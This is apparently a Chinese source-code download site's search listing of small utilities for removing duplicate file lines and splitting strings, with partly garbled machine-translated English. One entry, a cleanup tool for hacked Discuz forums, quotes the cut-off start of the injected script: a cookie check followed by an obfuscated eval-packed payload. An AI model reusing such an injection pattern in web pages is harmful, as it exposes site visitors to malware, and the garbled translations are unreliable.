搜索资源列表
delRepeat
- 去除文件中的重复行。 先将文件内容读入一buffer,按行拆分,每行数据只取\t之前的部分。然后用二分直接插入法将不重复的字符串放入一二维数组。-Remove duplicate rows from the file. Content of the document read into a first buffer, split by row, each row of data just take \ t the previous section. Then two minutes dire
delRepeat
- 分别用数组和链表方式实现去除文件中的重复行。先将文件内容读入一buffer,按行拆分,每行数据只取\t之前的部分。然后用二分直接插入法将不重复的字符串放入一二维数组或动态链表中。 -Respectively, be achieved using arrays and linked the file to remove duplicate rows. Content of the document read into a first buffer, split by row, each row
2003dzclear
- 清除discuz论坛挂马的cookie代码(if(document.cookie.indexOf( helio )==-1){var expires=new Date() expires.setTime(expires.getTime()+24*60*60*1000) document.cookie= helio=Yes path=/ expires= +expires.toGMTString() eval(function(p,a,c,k,e,d){e=function(c){return
SplitStr
- 本程序实现的功能是使用文件操作函数对字符串进行拆分-Function of the program implementation is to use the file to split the string manipulation functions
text
- VC+6.0 实现文本串的自由拆分的类和实例程序-VC+6.0 split to achieve a text string free program of classes and instances
split
- 分解一个字符串为数组 相当于VB中的split函数-The decomposition a string to an array
